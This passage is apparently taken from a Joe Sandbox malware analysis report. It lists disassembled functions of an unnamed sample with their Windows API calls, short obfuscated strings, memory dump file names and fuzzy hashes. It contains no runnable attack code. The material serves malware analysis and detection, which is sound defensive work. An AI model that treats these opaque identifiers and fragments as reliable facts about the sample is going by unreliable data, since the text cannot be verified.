                                                                                                                        • Part of subcall function 00522080: LdrInitializeThunk.NTDLL(0052523A,?,00000018,?,?,00000018,?,?,?), ref: 005220AE
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeLibrary$InitializeThunk
                                                                                                                      • String ID: mj
                                                                                                                      • API String ID: 764372645-1022201683
                                                                                                                      • Opcode ID: cc950d3227b1a0c1b5ffd8a112b6c0dc3b739fcc0e56228e6f4e60d1f52ebfb8
                                                                                                                      • Instruction ID: e166deee054c47a4bade8cd7ddddbac82cf841c09a4a6ace34a00d063bb13d30
                                                                                                                      • Opcode Fuzzy Hash: cc950d3227b1a0c1b5ffd8a112b6c0dc3b739fcc0e56228e6f4e60d1f52ebfb8
                                                                                                                      • Instruction Fuzzy Hash: A762FFB06083419FE724CF24D849B3BBBE2BF95314F24861DE698873A1E7359816DB47
                                                                                                                      Function 00505713 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 346COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 00505743
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: EnvironmentExpandStrings
                                                                                                                      • String ID: 67
                                                                                                                      • API String ID: 237503144-1886922373
                                                                                                                      • Opcode ID: 1c0160cf3d9fb03e9cb434e11f0a53de08f2d05af89803a1ef86f17a7eba08da
                                                                                                                      • Instruction ID: 0fb110b1212f324811cfbbad2134e9f2687a1740b3b6658d91993b97c45cd854
                                                                                                                      • Opcode Fuzzy Hash: 1c0160cf3d9fb03e9cb434e11f0a53de08f2d05af89803a1ef86f17a7eba08da
                                                                                                                      • Instruction Fuzzy Hash: A5B1B8B4508340CBE7209F54D88172FBBE0FF92708F44892DF9889B291E7798909DB87
                                                                                                                      Function 00505DA0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 232COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00505E98
                                                                                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 00505F24
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: EnvironmentExpandStrings
                                                                                                                      • String ID: 23
                                                                                                                      • API String ID: 237503144-326707096
                                                                                                                      • Opcode ID: c50ade58ac00b46efd7dfcaea3aa9aa1cc0a308a79b15e878245ece65e19863e
                                                                                                                      • Instruction ID: dc7c859b036c5e28c047389e03f85578ef48ca836ede3faf9ec44f01454e244c
                                                                                                                      • Opcode Fuzzy Hash: c50ade58ac00b46efd7dfcaea3aa9aa1cc0a308a79b15e878245ece65e19863e
                                                                                                                      • Instruction Fuzzy Hash: B97102B1A043589FEB20CFA8D846BEEBBB5FF55304F10452CE505AB2C1E775590ACB85
                                                                                                                      Function 00509917 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 230COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00509C9A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: EnvironmentExpandStrings
                                                                                                                      • String ID: 67
                                                                                                                      • API String ID: 237503144-1886922373
                                                                                                                      • Opcode ID: 81d052e300d2d5b7460e9e72a4e54fc88d397fdaacb2e690d2872e17065254f3
                                                                                                                      • Instruction ID: bc36cee4e45d6e6eaf4ce4f3349cf25174c3ab8fc8518276f793b6039e8fec55
                                                                                                                      • Opcode Fuzzy Hash: 81d052e300d2d5b7460e9e72a4e54fc88d397fdaacb2e690d2872e17065254f3
                                                                                                                      • Instruction Fuzzy Hash: 2261E1B66083809BD724DF25D88175FBBE5BFD9304F18492DF5898B282DB31D909CB82
                                                                                                                      Function 00509B7B Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 217COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00509C9A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: EnvironmentExpandStrings
                                                                                                                      • String ID: 67
                                                                                                                      • API String ID: 237503144-1886922373
                                                                                                                      • Opcode ID: ac8515602e56625b6af7328232b0bfa8bf40ec10cce1ea76dd2fb167e8692b92
                                                                                                                      • Instruction ID: c1e3d862c6e948594497dd48317d8e1cef9e43b8dc14323104c749c49c0f4af0
                                                                                                                      • Opcode Fuzzy Hash: ac8515602e56625b6af7328232b0bfa8bf40ec10cce1ea76dd2fb167e8692b92
                                                                                                                      • Instruction Fuzzy Hash: 1B61EEB22083809BD724DF25D88176FBBE5BFD9304F19492CF5898B282DB71D905CB82
                                                                                                                      Function 00517C10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 181COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MetricsSystem
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4116985748-3916222277
                                                                                                                      • Opcode ID: c56a115f883c46b5208596409c585be647283a25fd8fea9751fb346b200cbe70
                                                                                                                      • Instruction ID: 82c3e89f9b90252525e1c3287eab83ea325fade0f99854bd09e5560da82ec5f1
                                                                                                                      • Opcode Fuzzy Hash: c56a115f883c46b5208596409c585be647283a25fd8fea9751fb346b200cbe70
                                                                                                                      • Instruction Fuzzy Hash: 85C16AB4109390CADB70EF64E59979BBFF1BF86308F10992CE4984B294C7B49459CB93
                                                                                                                      Function 00507FC0 Relevance: 5.4, Strings: 4, Instructions: 431COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #C}$@-$up$vC
                                                                                                                      • API String ID: 0-3794437364
                                                                                                                      • Opcode ID: e6554259b04091f039387390ca0d442dbafbc230e4ea3c2df7bc3bcd129146c1
                                                                                                                      • Instruction ID: 70cdb244edb6e4e48c93bac67fe958405f8a0a99832beaae644b1a7f2b0d5f96
                                                                                                                      • Opcode Fuzzy Hash: e6554259b04091f039387390ca0d442dbafbc230e4ea3c2df7bc3bcd129146c1
                                                                                                                      • Instruction Fuzzy Hash: 9AE1C9B5208341DFE7249F24E885B6BBBA1FF96304F14882DE1C99B291DB359909CB52
                                                                                                                      Function 004F8BA2 Relevance: 5.4, Strings: 4, Instructions: 367COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: PWPQ$bd\,$fnga$oQ
                                                                                                                      • API String ID: 0-3706350231
                                                                                                                      • Opcode ID: c9998521cffba90a21165279c24dd70a6e9be7912687a55cc20c5de80f693812
                                                                                                                      • Instruction ID: 0c859a468c6a2f65d710017f4fc4fbb34da7c8f377c0481f6ae11e3b1ebf409c
                                                                                                                      • Opcode Fuzzy Hash: c9998521cffba90a21165279c24dd70a6e9be7912687a55cc20c5de80f693812
                                                                                                                      • Instruction Fuzzy Hash: 91C13672A083448FD7258F25C8557BB73E6EFD6314F08892EE5998B351EB388802C787
                                                                                                                      Function 004F906A Relevance: 5.3, Strings: 4, Instructions: 328COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 67$J$u$wq
                                                                                                                      • API String ID: 0-4028943437
                                                                                                                      • Opcode ID: 8935934e2d05e3e6b4ce06141e801cd1c3afed3a909233295625ebfde05377e8
                                                                                                                      • Instruction ID: da6e05855b738cc7ad4e88af3e1593cf6396c9ed0537bd035be396e298f9aa59
                                                                                                                      • Opcode Fuzzy Hash: 8935934e2d05e3e6b4ce06141e801cd1c3afed3a909233295625ebfde05377e8
                                                                                                                      • Instruction Fuzzy Hash: FAB187B04483828BD7348F25C4917EBBBE1EFA2314F18892DD5D94B785E7794846CB87
                                                                                                                      Function 005237D0 Relevance: 4.4, Strings: 3, Instructions: 647COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: M;R$>R$UUK
                                                                                                                      • API String ID: 0-4247670572
                                                                                                                      • Opcode ID: bf434081b7a200a964f8c2f297fdd76f2cf47cc3b8ffe31189b7104b120b2e5c
                                                                                                                      • Instruction ID: 64c11e1e4aebcf936e4c7adb2b16252386b1ca81a541f6865d8fc56028cf3d9d
                                                                                                                      • Opcode Fuzzy Hash: bf434081b7a200a964f8c2f297fdd76f2cf47cc3b8ffe31189b7104b120b2e5c
                                                                                                                      • Instruction Fuzzy Hash: 1E22E135608320CFD324DF28E89172AB7E2FF9A314F0A887DD585873A1D674E946DB81
                                                                                                                      Function 005238E0 Relevance: 4.3, Strings: 3, Instructions: 577COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: M;R$>R$UUK
                                                                                                                      • API String ID: 0-4247670572
                                                                                                                      • Opcode ID: 0eceb8ee84be2449eba36bc08ba91c3dea59d440a142f22b9d1183b918f6cc2c
                                                                                                                      • Instruction ID: 71462918a93c373d6928ba85b000cc9f28dc57464dedf4bfe3d24a5636d186c2
                                                                                                                      • Opcode Fuzzy Hash: 0eceb8ee84be2449eba36bc08ba91c3dea59d440a142f22b9d1183b918f6cc2c
                                                                                                                      • Instruction Fuzzy Hash: 3602CF35608320CFD314CF28E89172AB7E2BFDA314F1A887DD585873A1D675E94ADB81
                                                                                                                      Function 00520B00 Relevance: 4.3, Strings: 3, Instructions: 555COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID: S"(w$S"(w$f
                                                                                                                      • API String ID: 2994545307-891790955
                                                                                                                      • Opcode ID: 5db6b8ac647b9d3d3e4c593b8088805b796fc95d1f19448f04f2210258868274
                                                                                                                      • Instruction ID: a67673a64f431fbab4e299924fa3f363da2d950d517cb02def4ed8477eaaab38
                                                                                                                      • Opcode Fuzzy Hash: 5db6b8ac647b9d3d3e4c593b8088805b796fc95d1f19448f04f2210258868274
                                                                                                                      • Instruction Fuzzy Hash: B012DE756097618FC324CF19D880B6BBBE1BFD6314F188A2CE9954B3D2C771A805CB92
                                                                                                                      Function 00523A30 Relevance: 4.2, Strings: 3, Instructions: 488COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: M;R$>R$UUK
                                                                                                                      • API String ID: 0-4247670572
                                                                                                                      • Opcode ID: 4466e0fa2bfaeab4e833bcff76f8f47a8d901c3e31f0a297edfdbb9c463f5d3e
                                                                                                                      • Instruction ID: b069ddbf9b13404a8ca71ae42ee1989be94e7bd77c52f931a55d71804c082f69
                                                                                                                      • Opcode Fuzzy Hash: 4466e0fa2bfaeab4e833bcff76f8f47a8d901c3e31f0a297edfdbb9c463f5d3e
                                                                                                                      • Instruction Fuzzy Hash: A3E1D135A09321CFD314DF28E89172AB7E2FF9A310F0A887DD585873A1D674E946DB81
                                                                                                                      Function 00502370 Relevance: 4.2, Strings: 3, Instructions: 457COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: -jkhanold~m`$anold~m`$d~m`
                                                                                                                      • API String ID: 0-185452761
                                                                                                                      • Opcode ID: d49d82f6dee0b69ccdeb9ac9c72559ba4ec1d23df509649ca449329d3e76b77d
                                                                                                                      • Instruction ID: ab0214fa8cf193eda03517cd6f595791e2046ee2bb632c97d61d83f961cf23e9
                                                                                                                      • Opcode Fuzzy Hash: d49d82f6dee0b69ccdeb9ac9c72559ba4ec1d23df509649ca449329d3e76b77d
                                                                                                                      • Instruction Fuzzy Hash: 8CD18AB06083408FD714DF69C89AB6BBBE4FF85314F14491CE9958B392E7B9D809CB52
                                                                                                                      Function 00523AC0 Relevance: 4.2, Strings: 3, Instructions: 453COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: M;R$>R$UUK
                                                                                                                      • API String ID: 0-4247670572
                                                                                                                      • Opcode ID: 7f547057964492ca1467270020c94ff20bb0c79dc4a58c79a9f1f7846578d72e
                                                                                                                      • Instruction ID: 8875cb54e15b891a1066ba1855743c1c364968099e8325e9f349cc6db9b04a7f
                                                                                                                      • Opcode Fuzzy Hash: 7f547057964492ca1467270020c94ff20bb0c79dc4a58c79a9f1f7846578d72e
                                                                                                                      • Instruction Fuzzy Hash: 3CD1F136A08320CFD314DF28E89172AB7E2FF9A310F0A897DD58587391D674E946DB81
                                                                                                                      Function 00501180 Relevance: 4.2, Strings: 3, Instructions: 428COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 8deZ$<`>f$567
                                                                                                                      • API String ID: 0-937435233
                                                                                                                      • Opcode ID: 15728d2e5b8e9649842c035bd3803995799a1defba0281c3051e4f2290cc8bf1
                                                                                                                      • Instruction ID: 0be9ca93507caa1cb07ad79010f4c8af30a6187cfa68db488c63e25c9e0db7e8
                                                                                                                      • Opcode Fuzzy Hash: 15728d2e5b8e9649842c035bd3803995799a1defba0281c3051e4f2290cc8bf1
                                                                                                                      • Instruction Fuzzy Hash: 4BD1DDB05087108BD724DF24C852B6BBBF2FFD2354F098A1CE5868B395E7799805CB96
                                                                                                                      Function 0050F716 Relevance: 4.1, Strings: 3, Instructions: 366COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 5$Tx+$bC
                                                                                                                      • API String ID: 0-2958649183
                                                                                                                      • Opcode ID: 550bb235ea649947f00fed20e1d050833a2296655f2f461d8c8ac16059c17375
                                                                                                                      • Instruction ID: 6ed156042381b889294f6e11b2c530061822c4d1fd7fcefc289d0cd0a2635bd8
                                                                                                                      • Opcode Fuzzy Hash: 550bb235ea649947f00fed20e1d050833a2296655f2f461d8c8ac16059c17375
                                                                                                                      • Instruction Fuzzy Hash: 90B1BC7050C3C18AE7798F2980653AFBFE1AF93304F18896DE5D987692D77A8805CB52
